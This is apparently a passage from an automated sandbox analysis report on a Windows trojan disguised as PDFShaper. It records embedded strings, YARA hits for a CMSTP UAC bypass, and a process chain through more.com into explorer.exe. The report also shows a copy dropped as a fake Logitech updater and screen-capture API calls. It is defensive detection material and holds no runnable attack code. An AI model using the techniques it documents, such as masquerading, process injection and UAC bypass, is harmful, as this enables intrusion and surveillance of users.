                    Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#HR
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/buy.htmlopenU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/download.htmlopen
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/update.verU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.comP
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.comopen
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.winsoft.skU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.xfa.org/schema/xfa-template/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://xml.org/sax/properties/declaration-handler
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://xml.org/sax/properties/lexical-handler
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: https://ca.signfiles.com/TSAServer.aspx
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: https://www.winsoft.sk
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007661F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority

                    System Summary

                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Code function: 0_2_00799962 NtQuerySystemInformation
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007661F0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0076B700
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007D80EA
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007651A0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078F3EB
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0079C467
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00765450
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078B4B0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007A1679
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00792930
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007A5A76
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007A5B96
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0079CC09
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007A3DE9
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00764EF0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 00789D11 appears 60 times
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0078A560 appears 50 times
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 00783F40 appears 136 times
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | Static PE information: invalid certificate
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | Static PE information: Number of sections : 11 > 10
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000055DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000047FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezip.exe( vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | Binary or memory string: OriginalFilenamePDFShaper.exe6 vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@13/7@3/1
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize
                    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Roaming\LogiOptionsPlus
                    Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | File created: C:\Users\user\AppData\Local\Temp\9c813d63
                    Source: Yara match | File source: 5Z1WFRMTOXRH6X21Z8NU8.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.5Z1WFRMTOXRH6X21Z8NU8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | ReversingLabs: Detection: 18%
                    Source: explorer.exe | String found in binary or memory: " /add
                    Source: explorer.exe | String found in binary or memory: " /add /y
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: %%DebenuPDFLibrary-Start
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: SetLicenseKeyErrorPDW32.dll is not found. Please re-install program as administrator.S
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: EActiveX DLL is not found. Please re-install program as administrator.U
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: :The help file is not found. Please re-install the program.
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: document-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: document-text-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: file-image-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | String found in binary or memory: folder-add-2_large@1x
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | File read: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: kernel.appcore.dllJump to behavior
